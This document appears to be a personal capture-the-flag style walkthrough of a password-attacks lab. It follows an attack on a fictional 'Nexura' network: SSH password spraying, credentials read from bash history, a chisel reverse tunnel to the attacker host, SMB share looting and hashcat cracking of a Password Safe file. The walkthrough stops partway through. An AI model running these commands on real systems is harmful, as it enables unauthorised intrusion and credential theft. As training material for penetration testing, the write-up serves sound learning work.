Skills Assessment - Password Attacks

The Credential Theft Shuffle

The Credential Theft Shuffle, as coined by Sean Metcalf, is a systematic approach attackers use to compromise Active Directory environments by exploiting stolen credentials. The process begins with gaining initial access, often through phishing, followed by obtaining local administrator privileges on a machine. Attackers then extract credentials from memory using tools like Mimikatz and leverage these credentials to move laterally across the network. Techniques such as pass-the-hash (PtH) and tools like NetExec facilitate this lateral movement and further credential harvesting. The ultimate goal is to escalate privileges and gain control over the domain, often by compromising Domain Admin accounts or performing DCSync attacks. Sean emphasizes the importance of implementing security measures such as the Local Administrator Password Solution (LAPS), enforcing multi-factor authentication, and restricting administrative privileges to mitigate such attacks.

Skills Assessment

Betty Jayde works at Nexura LLC. We know she uses the password Texas123!@# on multiple websites, and we believe she may reuse it at work. Infiltrate Nexura's network and gain command execution on the domain controller. The following hosts are in-scope for this assessment:

Host	IP Address
DMZ01	10.129.*.* (External), 172.16.119.13 (Internal)
JUMP01	172.16.119.7
FILE01	172.16.119.10
DC01	172.16.119.11

Pivoting Primer

The internal hosts (JUMP01, FILE01, DC01) reside on a private subnet that is not directly accessible from our attack host. The only externally reachable system is DMZ01, which has a second interface connected to the internal network. This segmentation reflects a classic DMZ setup, where public-facing services are isolated from internal infrastructure.

To access these internal systems, we must first gain a foothold on DMZ01. From there, we can pivot — that is, route our traffic through the compromised host into the private network. This enables our tools to communicate with internal hosts as if they were directly accessible. After compromising the DMZ, refer to the module cheatsheet for the necessary commands to set up the pivot and continue your assessment.

---

What is the NTLM hash of NEXURA\Administrator?

Scan DMZ01:

[Feb 06, 2026 - 13:41:26 (CET)] exegol-htb /workspace # TARGET=10.129.234.116
[Feb 06, 2026 - 13:41:32 (CET)] exegol-htb /workspace # nmap -sCV "$TARGET"  
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-06 13:41 CET
Nmap scan report for 10.129.234.116
Host is up (0.071s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7108b0c4f3ca9757649770f9fec50c7b (RSA)
|   256 45c3b51463993d9eb32251e59776e150 (ECDSA)
|_  256 2ec2416646efb68195d5aa3523945538 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.13 seconds

We have an SSH potential acces. Use "Username Anarchy" to create a username list for Betty Jayde:

[Feb 06, 2026 - 13:31:13 (CET)] exegol-htb /workspace # username-anarchy Betty Jayde > betty.txt
[Feb 06, 2026 - 13:31:19 (CET)] exegol-htb /workspace # ls
betty.txt

Try usernames generated with netexec:

[Feb 06, 2026 - 13:36:41 (CET)] exegol-htb /workspace # netexec ssh 10.129.234.116 -u betty.txt -p 'Texas123!@#' 
SSH         10.129.234.116  22     10.129.234.116   [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.13
SSH         10.129.234.116  22     10.129.234.116   [-] betty:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [-] bettyjayde:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [-] betty.jayde:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [-] bettyjay:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [-] bettjayd:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [-] bettyj:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [-] b.jayde:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [-] bjayde:Texas123!@#
SSH         10.129.234.116  22     10.129.234.116   [+] xxxxxx:Texas123!@#  Linux - Shell access!

We found a valid username, wo use it to connect via ssh:

[Feb 06, 2026 - 16:22:16 (CET)] exegol-htb /workspace # ssh xxxxxx@"$TARGET"     
The authenticity of host '10.129.11.60 (10.129.11.60)' can't be established.
ED25519 key fingerprint is SHA256:HfXWue9Dnk+UvRXP6ytrRnXKIRSijm058/zFrj/1LvY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.11.60' (ED25519) to the list of known hosts.
xxxxxx@10.129.11.60's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri 06 Feb 2026 03:22:04 PM UTC

  System load:             0.01
  Usage of /:              56.5% of 6.25GB
  Memory usage:            6%
  Swap usage:              0%
  Processes:               227
  Users logged in:         0
  IPv4 address for ens160: 10.129.11.60
  IPv6 address for ens160: dead:beef::250:56ff:fe8a:4f94

 * Ubuntu 20.04 LTS Focal Fossa will reach its end of standard support on 31 May
 
   For more details see:
   https://ubuntu.com/20-04

Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 29 20:34:11 2025 from 10.10.16.12
xxxxxx@DMZ01:~$ 

We have access to DMZ01:

xxxxxx@DMZ01:~$ hostname
DMZ01

When we read the bash history of Betty, we found that:

jbetty@DMZ01:~$ cat .bash_history 
...SNIP...
sshpass -p "dealer-screwed-gym1" ssh hwilliam@file01
...SNIP...

So, we have news credentials for the user hwilliam.

hwilliam:dealer-screwed-gym1

Use chisel to get a proxy in the internal target network:

##In Exegol:
[Feb 06, 2026 - 17:04:01 (CET)] exegol-htb /workspace # chisel server -p 8000 --reverse 
2026/02/06 17:04:05 server: Reverse tunnelling enabled
2026/02/06 17:04:05 server: Fingerprint ttiW3Spe13RWrlUInaW5NSqXwFOBU0Q6g+m4qomLLJA=
2026/02/06 17:04:05 server: Listening on http://0.0.0.0:8000
2026/02/06 17:08:55 server: session#1: Client version (1.7.7) differs from server version (0.0.0-src)
2026/02/06 17:08:55 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
ls
2026/02/06 17:11:26 server: session#2: Client version (1.7.7) differs from server version (0.0.0-src)
2026/02/06 17:11:26 server: session#2: tun: proxy#R:127.0.0.1:1080=>socks: Listening



##In the target machine:
jbetty@DMZ01:~$ ./chisel client 10.10.14.57:8000 R:socks
2026/02/06 16:10:25 client: Connecting to ws://10.10.14.57:8000
2026/02/06 16:10:25 client: Connected (Latency 79.442767ms)

Scan DC01:

[Feb 06, 2026 - 17:36:11 (CET)] exegol-htb /workspace # proxychains nmap -sT -Pn -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985 172.16.119.11                           
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-06 17:36 CET
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:139  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:53  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:3389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:5985  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:464  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:3268  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:593  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:636  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.11:3269  ...  OK
Nmap scan report for 172.16.119.11
Host is up (0.21s latency).

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 4.99 seconds

Scan FILE01:

[Feb 06, 2026 - 17:58:51 (CET)] exegol-htb /workspace # TARGET=172.16.119.10             
[Feb 06, 2026 - 17:58:58 (CET)] exegol-htb /workspace # proxychains nmap -sT -Pn -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985 "$TARGET"    
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-06 17:59 CET
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:139 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:3389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:53 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:5985  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:3268 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:389 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:593 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:464 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:3269 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:88 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:636 <--socket error or timeout!
Nmap scan report for 172.16.119.10
Host is up (0.20s latency).

PORT     STATE  SERVICE
53/tcp   closed domain
88/tcp   closed kerberos-sec
135/tcp  open   msrpc
139/tcp  closed netbios-ssn
389/tcp  closed ldap
445/tcp  open   microsoft-ds
464/tcp  closed kpasswd5
593/tcp  closed http-rpc-epmap
636/tcp  closed ldapssl
3268/tcp closed globalcatLDAP
3269/tcp closed globalcatLDAPssl
3389/tcp open   ms-wbt-server
5985/tcp open   wsman

Scan Jump01:

[Feb 06, 2026 - 18:02:10 (CET)] exegol-htb /workspace # TARGET=172.16.119.7
[Feb 06, 2026 - 18:02:11 (CET)] exegol-htb /workspace # proxychains nmap -sT -Pn -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985 "$TARGET"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-06 18:02 CET
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:445 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:135 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:139 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:53 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:3389  ...  OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:464 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:636 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:3269 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:3268 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:88 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:5985  ...  OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:593 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.7:389 <--socket error or timeout!
Nmap scan report for 172.16.119.7
Host is up (13s latency).

PORT     STATE  SERVICE
53/tcp   closed domain
88/tcp   closed kerberos-sec
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
389/tcp  closed ldap
445/tcp  closed microsoft-ds
464/tcp  closed kpasswd5
593/tcp  closed http-rpc-epmap
636/tcp  closed ldapssl
3268/tcp closed globalcatLDAP
3269/tcp closed globalcatLDAPssl
3389/tcp open   ms-wbt-server
5985/tcp open   wsman

Nmap done: 1 IP address (1 host up) scanned in 178.76 seconds

Enumerate SMB Shares on FILE01:

[Feb 06, 2026 - 18:40:54 (CET)] exegol-htb /workspace # proxychains smbclient -L //"$TARGET" -U 'nexura.htb\hwilliam'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:445  ...  OK
Password for [NEXURA.HTB\hwilliam]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HR              Disk      
	IPC$            IPC       Remote IPC
	IT              Disk      
	MANAGEMENT      Disk      
	PRIVATE         Disk      
	TRANSFER        Disk      
SMB1 disabled -- no workgroup available

Access to HR:

[Feb 06, 2026 - 18:57:44 (CET)] exegol-htb /workspace # proxychains smbclient -U 'nexura.htb\hwilliam' //"$TARGET"/HR
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
Password for [NEXURA.HTB\hwilliam]:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.119.10:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb  6 18:39:37 2026
  ..                                  D        0  Fri Feb  6 18:39:37 2026
  2024                                D        0  Tue Apr 29 18:08:16 2025
  2025                                D        0  Tue Apr 29 18:07:24 2025
  Archive                             D        0  Tue Apr 29 18:10:24 2025

		5056511 blocks of size 4096. 1578861 blocks available

Extract a specific password file:

smb: \> ls
  .                                   D        0  Fri Feb  6 18:39:37 2026
  ..                                  D        0  Fri Feb  6 18:39:37 2026
  2024                                D        0  Tue Apr 29 18:08:16 2025
  2025                                D        0  Tue Apr 29 18:07:24 2025
  Archive                             D        0  Tue Apr 29 18:10:24 2025

		5056511 blocks of size 4096. 1578845 blocks available
smb: \> cd Archive\
smb: \Archive\> ls
  .                                   D        0  Tue Apr 29 18:10:24 2025
  ..                                  D        0  Tue Apr 29 18:10:24 2025
  Code of Conduct_OLD.xlsx            A    29380  Tue Apr 29 18:02:27 2025
  Company presentation OLD.ppt        A   912384  Tue Apr 29 18:02:52 2025
  Covid 19 Policy.ppt                 A   912384  Tue Apr 29 18:02:52 2025
  Employee Roster 2023.xlsx           A    13246  Tue Apr 29 18:02:30 2025
  Employee-Passwords_OLD.plk          A       48  Tue Apr 29 17:13:43 2025
  Employee-Passwords_OLD.psafe3       A     1080  Tue Apr 29 17:09:57 2025
  Employee-Passwords_OLD_011.ibak      A      856  Tue Apr 29 17:10:02 2025
  Employee-Passwords_OLD_012.ibak      A      904  Tue Apr 29 17:10:04 2025
  Employee-Passwords_OLD_013.ibak      A      952  Tue Apr 29 17:10:07 2025
  Employee_handbook_2025.doc          A    26069  Tue Apr 29 18:02:39 2025
  Exit interview Questions.docx       A    34375  Tue Apr 29 18:01:34 2025
  HR Audit Guide ARCHIVE.docx         A    34375  Tue Apr 29 18:01:34 2025
  HR Budget Forecast 2026.xlsx        A    32924  Tue Apr 29 18:02:28 2025
  HR Policies and Procedures.docx      A   120515  Tue Apr 29 18:01:34 2025
  HRIS System Training.xlsx           A    29380  Tue Apr 29 18:02:27 2025
  Interview Questions Template.doc      A    32768  Tue Apr 29 18:02:38 2025
  Manager Onboarding Program.ppt      A   530432  Tue Apr 29 18:02:52 2025
  Offboarding Checklist.docx          A  1311881  Tue Apr 29 18:01:35 2025
  Offer Letter Template_OLD.docx      A   120515  Tue Apr 29 18:01:34 2025
  Password Policy OUTDATED.doc        A    32768  Tue Apr 29 18:02:38 2025
  PTO Tracking Sheet OLD.ppt          A  1028096  Tue Apr 29 18:02:49 2025
  Temporary Contractor List_OLD.xlsx      A    32924  Tue Apr 29 18:02:28 2025
ge
		5056511 blocks of size 4096. 1578845 blocks available
smb: \Archive\> get Employee-Passwords_OLD.psafe3 
getting file \Archive\Employee-Passwords_OLD.psafe3 of size 1080 as Employee-Passwords_OLD.psafe3 (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)

Crack the .psafe3 file to get the password:

[Feb 06, 2026 - 18:48:37 (CET)] exegol-htb /workspace # hashcat --hash-type 5200 --attack-mode 0 Employee-Passwords_OLD.psafe3 `fzf-wordlists` 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 7 7735HS with Radeon Graphics, 2739/5542 MB (1024 MB allocatable), 16MCU

...SNIP...

Employee-Passwords_OLD.psafe3:michaeljackson              
                                                          
...SNIP...

psafe3 is an extention from Password Safe, a database system for passwords.

Install it on our machine and add .pwsafe3 file and the password associate:

---